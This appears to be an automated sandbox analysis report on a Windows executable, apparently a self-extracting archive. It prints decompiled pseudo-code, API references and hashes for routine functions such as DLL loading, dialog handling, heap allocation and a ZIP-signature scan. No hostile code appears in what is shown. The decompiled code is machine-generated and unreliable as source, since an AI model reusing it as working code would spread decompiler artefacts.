                                                                                                                • Instruction ID: 61261a33b723f3f5b8238b96e0a2f3bf29db085aefe05f226de3ce8a6ebb3f65
                                                                                                                • Opcode Fuzzy Hash: df517fb4d316053de6b20093a683134f797b8b2020e68f095f7eee4e9553675d
                                                                                                                • Instruction Fuzzy Hash: 3BE06571900158ABCB10AB789C04BD677A8AB087E1F004165BD54F7290DA715D458BE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC69F6, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC69F6(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00ED3370();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E00EC35E2( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                                                                                                                0x00ec69fe
                                                                                                                0x00ec6a11
                                                                                                                0x00ec6a19
                                                                                                                0x00ec6a27
                                                                                                                0x00ec6a33
                                                                                                                0x00ec6a33
                                                                                                                0x00ec6a3d

                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EC6A11
                                                                                                                • LoadLibraryW.KERNELBASE(?,?,00EC5706,Crypt32.dll,00000000,00EC578A,?,?,00EC576C,?,?,?,?), ref: 00EC6A33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1175261203-0
                                                                                                                • Opcode ID: d40ce72f74d1251287621d1c9d730be087f799d98cecb43f0d9340e1026c219c
                                                                                                                • Instruction ID: 8fa9aa31c42188743af1cdfd627a702b0368d7d3a9eb18093b8d175737685792
                                                                                                                • Opcode Fuzzy Hash: d40ce72f74d1251287621d1c9d730be087f799d98cecb43f0d9340e1026c219c
                                                                                                                • Instruction Fuzzy Hash: 1CE0127681515C6ADB11ABA59C44FD777ACEB08392F0440A6B949E2104DAB5DA848BF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECEE7F, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00ECEE7F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xee83e0;
				if(_a8 == 0) {
					L00ED3322(); // executed
				} else {
					L00ED3328();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                                                                                                                0x00ecee82
                                                                                                                0x00ecee84
                                                                                                                0x00ecee86
                                                                                                                0x00ecee89
                                                                                                                0x00ecee8c
                                                                                                                0x00ecee94
                                                                                                                0x00ecee95
                                                                                                                0x00ecee98
                                                                                                                0x00ecee9e
                                                                                                                0x00eceea7
                                                                                                                0x00eceea0
                                                                                                                0x00eceea0
                                                                                                                0x00eceea0
                                                                                                                0x00eceeac
                                                                                                                0x00eceeb2
                                                                                                                0x00eceebb

                                                                                                                APIs
                                                                                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00ECEEA0
                                                                                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00ECEEA7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: BitmapCreateFromGdipStream
                                                                                                                • String ID:
                                                                                                                • API String ID: 1918208029-0
                                                                                                                • Opcode ID: 6996f7ea184e8ad89bf1690a3bdbf575d7ba07092eb74e9155c783c988507321
                                                                                                                • Instruction ID: 4c979fdb44c84d373b3086583e324269dc524424940813d78d45a4e29841ce95
                                                                                                                • Opcode Fuzzy Hash: 6996f7ea184e8ad89bf1690a3bdbf575d7ba07092eb74e9155c783c988507321
                                                                                                                • Instruction Fuzzy Hash: A4E0ED75901318EFC760DF99CA01B9DBBE8EB04751F20915FF899A3300D7716E549B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED725C, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00ED725C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00ED8216(__eflags, E00ED71A0); // executed
				 *0xef1570 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00ED82C4(__eflags, _t1, 0xf256bc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00ED728F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                0x00ed7261
                                                                                                                0x00ed7266
                                                                                                                0x00ed726f
                                                                                                                0x00ed727a
                                                                                                                0x00ed7280
                                                                                                                0x00ed7281
                                                                                                                0x00ed7283
                                                                                                                0x00ed728e
                                                                                                                0x00ed7285
                                                                                                                0x00ed7285
                                                                                                                0x00000000
                                                                                                                0x00ed7285
                                                                                                                0x00ed7271
                                                                                                                0x00ed7271
                                                                                                                0x00ed7273
                                                                                                                0x00ed7273

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00ED8216: try_get_function.LIBVCRUNTIME ref: 00ED822B
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ED727A
                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00ED7285
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                • String ID:
                                                                                                                • API String ID: 806969131-0
                                                                                                                • Opcode ID: c7dc0bc453dccf8098afd24e041ba8cf02fb86dff05de3cfbe03c48695130e04
                                                                                                                • Instruction ID: 7dcc641394bfe298a0faf444a596c77676b8a68fdb17077ab372dc45753e41b1
                                                                                                                • Opcode Fuzzy Hash: c7dc0bc453dccf8098afd24e041ba8cf02fb86dff05de3cfbe03c48695130e04
                                                                                                                • Instruction Fuzzy Hash: 48D0A7B450C741541D4027F02A0346A13C0DA52BB43F03387F0E0FA3F2FE2284076011
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2D5C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 30%
                                                                                                                			E00ED2D5C(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t7;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0xee9290 & 0x00001000) == 0) {
					return _t5;
				} else {
					E00ED2E0A(__ecx, __esi);
					_t7 =  *0xf25348; // 0x0
					_t8 = _t7 + 1;
					 *0xf25348 = _t8;
					if(_t8 == 1) {
						E00ED2F5C(4, 0xf2534c); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0xef1558; // 0xf529bb33
					_v8 = _t9 ^ _t26;
					if(E00ED2D8F() == 0) {
						 *0xf25344 = 0;
					} else {
						 *0xee7220(0xf25344, _t20);
						 *((intOrPtr*)( *0xf25340))();
					}
					return E00ED3C6A(_v8 ^ _t24);
				}
			}











                                                                                                                0x00ed2d5c
                                                                                                                0x00ed2d5c
                                                                                                                0x00ed2d66
                                                                                                                0x00ed2d8e
                                                                                                                0x00ed2d68
                                                                                                                0x00ed2d68
                                                                                                                0x00ed2d6d
                                                                                                                0x00ed2d72
                                                                                                                0x00ed2d73
                                                                                                                0x00ed2d7b
                                                                                                                0x00ed2d84
                                                                                                                0x00ed2d84
                                                                                                                0x00ed3007
                                                                                                                0x00ed3009
                                                                                                                0x00ed300a
                                                                                                                0x00ed3011
                                                                                                                0x00ed301b
                                                                                                                0x00ed3036
                                                                                                                0x00ed301d
                                                                                                                0x00ed302b
                                                                                                                0x00ed3031
                                                                                                                0x00ed3033
                                                                                                                0x00ed304d
                                                                                                                0x00ed304d

                                                                                                                APIs
                                                                                                                • DloadLock.DELAYIMP ref: 00ED2D68
                                                                                                                  • Part of subcall function 00ED2E0A: RtlAcquireSRWLockExclusive.NTDLL ref: 00ED2E37
                                                                                                                • DloadProtectSection.DELAYIMP ref: 00ED2D84
                                                                                                                  • Part of subcall function 00ED2F5C: DloadObtainSection.DELAYIMP ref: 00ED2F6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Dload$LockSection$AcquireExclusiveObtainProtect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3818887397-0
                                                                                                                • Opcode ID: f06915aa8400f0ae40ac71a9fc1fe093e2ae72b353e994c3d82f3ea9e67c9f0b
                                                                                                                • Instruction ID: 511d34d782429b7498a5bbf34ee414734ea6b06b103d9e9e7aac2347482aefaf
                                                                                                                • Opcode Fuzzy Hash: f06915aa8400f0ae40ac71a9fc1fe093e2ae72b353e994c3d82f3ea9e67c9f0b
                                                                                                                • Instruction Fuzzy Hash: 2AD0A9741002889EC225EB20AC82344B692F324F80B40340AF705F93A1C3B04883EA12
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC11B5, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00EC11B5(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                                                                                                                0x00ec11bc
                                                                                                                0x00ec11d1
                                                                                                                0x00ec11d7

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3351165006-0
                                                                                                                • Opcode ID: 474d9147792468c393c5f60cc4abab6b53ce08c21953c8bfd7d04947d05d285b
                                                                                                                • Instruction ID: 33de2cc4efd05da60ff81b3f50b9ddecc6eecbc626b10c83334fc9a67c1e9f1b
                                                                                                                • Opcode Fuzzy Hash: 474d9147792468c393c5f60cc4abab6b53ce08c21953c8bfd7d04947d05d285b
                                                                                                                • Instruction Fuzzy Hash: 1CC01232058204BECB011BB0DC0AC2ABBA8ABA5612F00C908B0A6C0061C23DC030EB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1197, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00EC1197(struct HWND__* _a4, int _a8, signed char _a12) {
				void* _t6;

				_t6 =  *0xf26130(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
				return _t6;
			}




                                                                                                                0x00ec11ac
                                                                                                                0x00ec11b2

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00EC11A5
                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00EC11AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherItemUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 4250310104-0
                                                                                                                • Opcode ID: 3ca0db2b0bee96cf60633d347549beda144520e446a6f7b6793a889f0b7d08d3
                                                                                                                • Instruction ID: c9a792633f99d6261f0740cb1fff60f99a8c36d00fcf40b22195ecfd19715d67
                                                                                                                • Opcode Fuzzy Hash: 3ca0db2b0bee96cf60633d347549beda144520e446a6f7b6793a889f0b7d08d3
                                                                                                                • Instruction Fuzzy Hash: 74C04C76408244BFCB115BA09D08C2FBFA9AB94712F10C809B1A6C1021C6399431EB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECFA4C, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00ECFA4C(void* __edx, void* __eflags) {
				void* __esi;
				void* _t43;
				signed int _t50;
				signed int _t63;
				signed int* _t65;
				intOrPtr _t76;
				signed int _t79;
				intOrPtr _t82;
				void* _t84;
				void* _t88;
				void* _t89;
				void* _t91;
				void* _t97;

				_t84 = __edx;
				E00ED3344();
				E00ED3370();
				_push(_t89);
				E00EC1AA7(_t91 - 0x1034);
				_t63 = 0;
				_t67 = _t91 - 0x1034;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				if(E00EC1E40(_t91 - 0x1034, _t89,  *((intOrPtr*)(_t91 + 0xc)), 0) == 0) {
					L24:
					E00EC1B02(_t91 - 0x1034, _t89);
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t63;
				}
				_t89 = 0x10000;
				_push(0x10000);
				_t88 = E00EDA91B(_t67);
				if(_t88 == 0) {
					L23:
					_t63 = 1;
					goto L24;
				}
				E00EC2130(_t91 - 0x1034, _t91, 0, 0, 2);
				_t43 = E00EC2240();
				_t97 = _t84;
				if(_t97 > 0 || _t97 >= 0 && _t43 >= 0x10000) {
					_push(_t63);
					asm("sbb edx, ebx");
					_push(_t84);
					_push(_t43 - _t89);
				} else {
					_push(_t63);
					_push(_t63);
					_push(_t63);
				}
				E00EC2130(_t91 - 0x1034, _t91);
				 *((intOrPtr*)(_t91 - 0x10)) = E00EC2040(_t84, _t88, _t89);
				E00EC1B80(_t91 - 0x1034);
				_t76 =  *((intOrPtr*)(_t91 - 0x10));
				_t89 = _t76 - 4;
				while(_t89 > 0) {
					if( *((char*)(_t89 + _t88)) != 0x50 ||  *((char*)(_t89 + _t88 + 1)) != 0x4b ||  *((char*)(_t89 + _t88 + 2)) != 5 ||  *((char*)(_t89 + _t88 + 3)) != 6 || _t89 >= _t76 - 0x16) {
						L14:
						_t89 = _t89 - 1;
						continue;
					} else {
						_t50 =  *(_t89 + _t88 + 0x14) & 0x0000ffff;
						if(_t50 != 0) {
							_t79 = _t76 - _t89 + 0xffffffea;
							if(_t50 >= _t79) {
								_t50 = _t79;
							}
							 *( *(_t91 + 0x14)) = _t50;
							_push(2 + _t50 * 2);
							_t82 = E00EDA91B( *(_t91 + 0x14));
							 *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x10)))) = _t82;
							if(_t82 != 0) {
								_t65 =  *(_t91 + 0x14);
								_t29 = _t88 + 0x16; // 0x16
								E00EC7757(_t29 + _t89, _t82,  *_t65 + 1);
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x10)))) +  *_t65 * 2)) = 0;
							} else {
								 *( *(_t91 + 0x14)) = _t63;
							}
							L22:
							L00ED869E(_t88); // executed
							goto L23;
						}
						goto L14;
					}
				}
				goto L22;
			}
















                                                                                                                0x00ecfa4c
                                                                                                                0x00ecfa51
                                                                                                                0x00ecfa5b
                                                                                                                0x00ecfa61
                                                                                                                0x00ecfa69
                                                                                                                0x00ecfa6e
                                                                                                                0x00ecfa70
                                                                                                                0x00ecfa7a
                                                                                                                0x00ecfa84
                                                                                                                0x00ecfb89
                                                                                                                0x00ecfb8f
                                                                                                                0x00ecfb9c
                                                                                                                0x00ecfba6
                                                                                                                0x00ecfba6
                                                                                                                0x00ecfa8a
                                                                                                                0x00ecfa8f
                                                                                                                0x00ecfa95
                                                                                                                0x00ecfa9a
                                                                                                                0x00ecfb87
                                                                                                                0x00ecfb87
                                                                                                                0x00000000
                                                                                                                0x00ecfb87
                                                                                                                0x00ecfaaa
                                                                                                                0x00ecfab5
                                                                                                                0x00ecfaba
                                                                                                                0x00ecfabc
                                                                                                                0x00ecfacb
                                                                                                                0x00ecfacc
                                                                                                                0x00ecface
                                                                                                                0x00ecfacf
                                                                                                                0x00ecfac4
                                                                                                                0x00ecfac4
                                                                                                                0x00ecfac5
                                                                                                                0x00ecfac6
                                                                                                                0x00ecfac6
                                                                                                                0x00ecfad6
                                                                                                                0x00ecfaee
                                                                                                                0x00ecfaf1
                                                                                                                0x00ecfaf6
                                                                                                                0x00ecfaf9
                                                                                                                0x00ecfb2a
                                                                                                                0x00ecfb02
                                                                                                                0x00ecfb29
                                                                                                                0x00ecfb29
                                                                                                                0x00000000
                                                                                                                0x00ecfb20
                                                                                                                0x00ecfb20
                                                                                                                0x00ecfb27
                                                                                                                0x00ecfb32
                                                                                                                0x00ecfb37
                                                                                                                0x00ecfb39
                                                                                                                0x00ecfb39
                                                                                                                0x00ecfb3e
                                                                                                                0x00ecfb47
                                                                                                                0x00ecfb4e
                                                                                                                0x00ecfb53
                                                                                                                0x00ecfb57
                                                                                                                0x00ecfb60
                                                                                                                0x00ecfb67
                                                                                                                0x00ecfb6e
                                                                                                                0x00ecfb7c
                                                                                                                0x00ecfb59
                                                                                                                0x00ecfb5c
                                                                                                                0x00ecfb5c
                                                                                                                0x00ecfb80
                                                                                                                0x00ecfb81
                                                                                                                0x00000000
                                                                                                                0x00ecfb86
                                                                                                                0x00000000
                                                                                                                0x00ecfb27
                                                                                                                0x00ecfb02
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00ECFA51
                                                                                                                  • Part of subcall function 00EC1E40: CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000), ref: 00EC1EDC
                                                                                                                  • Part of subcall function 00EC1E40: GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000), ref: 00EC1EE9
                                                                                                                  • Part of subcall function 00EC1E40: CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00000000,00000003,?,00000000), ref: 00EC1F1E
                                                                                                                  • Part of subcall function 00EC1E40: GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00000000,00000003,?,00000000), ref: 00EC1F26
                                                                                                                  • Part of subcall function 00EC1E40: SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00000000,00000003,?,00000000), ref: 00EC1F6B
                                                                                                                  • Part of subcall function 00EC2240: SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00EC2276
                                                                                                                  • Part of subcall function 00EC2240: GetLastError.KERNEL32 ref: 00EC2282
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLast$Create$H_prologPointerTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1391248518-0
                                                                                                                • Opcode ID: e3d2e9969ae0579391d4b433d082b3749768750a44eaa901d6cfb74c13911433
                                                                                                                • Instruction ID: 7b54759a512cfdd20e7f31a2b1a904f9cc05962d24bdc16fb6647ebd1eb4088d
                                                                                                                • Opcode Fuzzy Hash: e3d2e9969ae0579391d4b433d082b3749768750a44eaa901d6cfb74c13911433
                                                                                                                • Instruction Fuzzy Hash: B84124B09005559ECB24DF24CEA1FEA77EAEF41348F0021BEF546B7250DB329E46CA50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED22F0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00ED22F0(void* __ecx, void* __eflags) {
				intOrPtr _t12;
				char _t13;
				char _t14;
				void* _t15;
				void* _t26;
				void* _t31;
				intOrPtr _t33;

				E00ED3344();
				_push(__ecx);
				 *((intOrPtr*)(_t31 - 0x10)) = _t33;
				E00EDB78E(0xf18ee2, "X");
				E00EC6866(0xf1af04, _t26, 0xee7540);
				E00EDB78E(0xf19f02,  *((intOrPtr*)(_t31 + 0xc)));
				L00EC131B(0xf10bf0, _t26,  *((intOrPtr*)(_t31 + 0xc)));
				_t4 = _t31 - 4;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				_t12 = 2;
				 *0xf17ec0 = _t12;
				 *0xf17ebc = _t12;
				 *0xf17eb8 = _t12;
				_t13 =  *0xf0ca61; // 0x0
				 *0xf16d43 = _t13;
				_t14 =  *0xf0ca62; // 0x0
				 *0xf16d7c = 1;
				 *0xf16d7f = 1;
				 *0xf16d44 = _t14; // executed
				_t15 = E00ECD841(0xf10bf0, _t26,  *_t4); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t15;
			}










                                                                                                                0x00ed22f5
                                                                                                                0x00ed22fa
                                                                                                                0x00ed22fe
                                                                                                                0x00ed230b
                                                                                                                0x00ed231c
                                                                                                                0x00ed2329
                                                                                                                0x00ed2338
                                                                                                                0x00ed233d
                                                                                                                0x00ed233d
                                                                                                                0x00ed2343
                                                                                                                0x00ed2344
                                                                                                                0x00ed2349
                                                                                                                0x00ed234e
                                                                                                                0x00ed2353
                                                                                                                0x00ed2358
                                                                                                                0x00ed235d
                                                                                                                0x00ed2362
                                                                                                                0x00ed2369
                                                                                                                0x00ed2370
                                                                                                                0x00ed2375
                                                                                                                0x00ed237f
                                                                                                                0x00ed238a

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00ED22F5
                                                                                                                  • Part of subcall function 00ECD841: __EH_prolog.LIBCMT ref: 00ECD846
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 7cc52dee57bca2deea8d4603545f91f10bbf3013b7b004a027e2e1c350ebb154
                                                                                                                • Instruction ID: c1413a2af957d4a0c298aee206af94bf847eecd44bc9f859faedad58c1990048
                                                                                                                • Opcode Fuzzy Hash: 7cc52dee57bca2deea8d4603545f91f10bbf3013b7b004a027e2e1c350ebb154
                                                                                                                • Instruction Fuzzy Hash: A201F53660C388AEC304EB69BD13BD87FF4E755714F10915FF45496292DBB21941A722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDD5E4, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00EDD5E4(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				long _t10;

				_t8 = __ecx;
				_t10 = _a4;
				if(_t10 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00EDD9BD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t10 == 0) {
					_t10 = _t10 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xf25d54, 0, _t10); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00EDD424();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00EDD0D0(_t7, _t8, _t9, _t10, __eflags, _t10);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}










                                                                                                                0x00edd5e4
                                                                                                                0x00edd5ea
                                                                                                                0x00edd5f0
                                                                                                                0x00edd622
